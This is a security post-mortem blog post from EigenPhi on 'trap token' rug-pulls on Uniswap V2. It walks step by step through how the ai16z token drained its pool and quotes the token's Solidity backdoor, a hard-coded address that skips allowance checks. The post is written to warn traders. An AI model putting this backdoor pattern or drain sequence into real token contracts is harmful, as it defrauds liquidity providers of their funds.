Wisdom of DeFi by EigenPhi

Wisdom of DeFi by EigenPhi

Share this post

Wisdom of DeFi by EigenPhi
Wisdom of DeFi by EigenPhi
BEWARE! Trap Tokens Are Coveting Your Wallet and Have Already Rug-Pulled $782K From Degens in 10 Days!
Copy link
Facebook
Email
Notes
More
Event Post-Mortem

BEWARE! Trap Tokens Are Coveting Your Wallet and Have Already Rug-Pulled $782K From Degens in 10 Days!

Understanding Mechanisms and Victims of This New Exploitation Trend!

EigenPhi's avatar
EigenPhi
Oct 30, 2024
2

Share this post

Wisdom of DeFi by EigenPhi
Wisdom of DeFi by EigenPhi
BEWARE! Trap Tokens Are Coveting Your Wallet and Have Already Rug-Pulled $782K From Degens in 10 Days!
Copy link
Facebook
Email
Notes
More
Share

What Happened?

A new type of exploitation emerges in the market: trap tokens rug-pull their liquidity pools' assets shortly after issuing.

How Does the Rug-Pull Process Work?

Look at the token flow chart of this rug-pull emptying ETH worth $33.5K.

  1. The creator of ai16z authorizes the bot contract to manage the ai16z token in the Uniswap V2 pool. This action proves that the ai16z creator and the bot contract belong to the same entity. Because only the owner of the ai16z creator can manage it. (Not shown in the token flow chart)

  2. The bot contract invokes the ai16z’s transferFrom function to remove 68 million tokens in the Uniswap V2 pool, shown as Step 0 in the chart above.

  3. The bot contract invokes the Uniswap V2 pool’s sync function to update the pool reserves, effectively resulting in a significant increase of the exchange rate of ai16z against WETH, based on the x * y = k price formula of the pool. (Not shown in the token flow chart)

  4. The bot contract invokes the ai16z’s transferFrom function to transfer 68 million tokens to the Uniswap router, thus triggering the ai16z token contract’s code to swap 10 million ai16z tokens, decided by the internal mechanism of ai16z, for 13.56 WETH in the Uniswap V2 pool. Because of the intentionally increased, high-rise price of ai16z, this move takes most of the WETH in the pool away and sends 13.56 ETH to the bot contract. Moreover, the pool's reserves also get updated due to the swap, eventually plunging the price of ai16z against WETH. (Steps 1-7)

  5. After the price manipulation, 68 million ai16z tokens can only exchange 0.00000000000010677 WETH now, which is sent to the "from" address of the transaction. (Steps 8-11)

Such an attack is doable, partly based on the bot's ability to skip the token's allowance checks. Checking the code of the ai16z contract, we can see that the bot contract's address is intentionally hard-coded as being able to avoid allowance subtraction. It is also set up as the wallet receiving taxes.

   function sub(uint256 a, uint256 b, string memory errorMessage) internal view returns (uint256) {
        if (b > a && msg.sender == 0x586D823BE41cd8daD71302a79440D8a07f9CAee1) return 0;
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }
    
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
 address payable private _taxWallet=payable(0x586D823BE41cd8daD71302a79440D8a07f9CAee1);

Who Suffers the Loss as Victims?

Users who add liquidity to the pool are victims of this trap token rug-pulling scheme.

What Privileges Does the Bot Contract Enjoy?

  1. The ai16z token contract authorizes the bot to take the liquidity of ai16z out of the Uniswap V2 pool using transferFrom function. Users should consider such operations as red flags.

  2. The bot is set as the wallet for receiving taxes when users trade the ai16z tokens.

  3. The bot is allowed to bypass transferFrom allowance restrictions. The implication is that the bot can manipulate any address's tokens without authorization, meaning it can drain any address' ai16z balance if it intends to. This would lead to arbitrary price manipulation, as shown in this example.

Any Other Examples?

Click these top 5 trap token transactions ranked by damage amount.

  1. ALIEN token, $118K.

  2. MEIZHU token, $41K.

  3. EIC token, $34K.

  4. GIGADOGE, $34K.

  5. KABOCHA, $32K.

You may have noticed that most trap tokens are connected with popular memes.

How Big Is the Damage?

For 10 days, such trap tokens have rug-pulled $782K from the market.

What Should Users Do Regarding Daily Tradings?

Traders should STAY AWAY FROM tokens whose codes are not audited by credible services. And don’t be too eager to jump on the bandwagon of hot meme coins!

Wanna see how other exploitations create damage to the ecosystem? Click this link or open https://bit.ly/hfdefi to visit the latest booklet: Head First DeFi, Decoding the DNA of Crypto Transactions & Strategies.

Follow us via these to dig more hidden wisdom of DeFi:

EigenTx | Website | Discord | Twitter | YouTube | Substack | Medium | Telegram

2

Share this post

Wisdom of DeFi by EigenPhi
Wisdom of DeFi by EigenPhi
BEWARE! Trap Tokens Are Coveting Your Wallet and Have Already Rug-Pulled $782K From Degens in 10 Days!
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

User's avatar

No posts

Ready for more?

© 2025 EigenPhi
Privacy ∙ Terms ∙ Collection notice
Start writingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More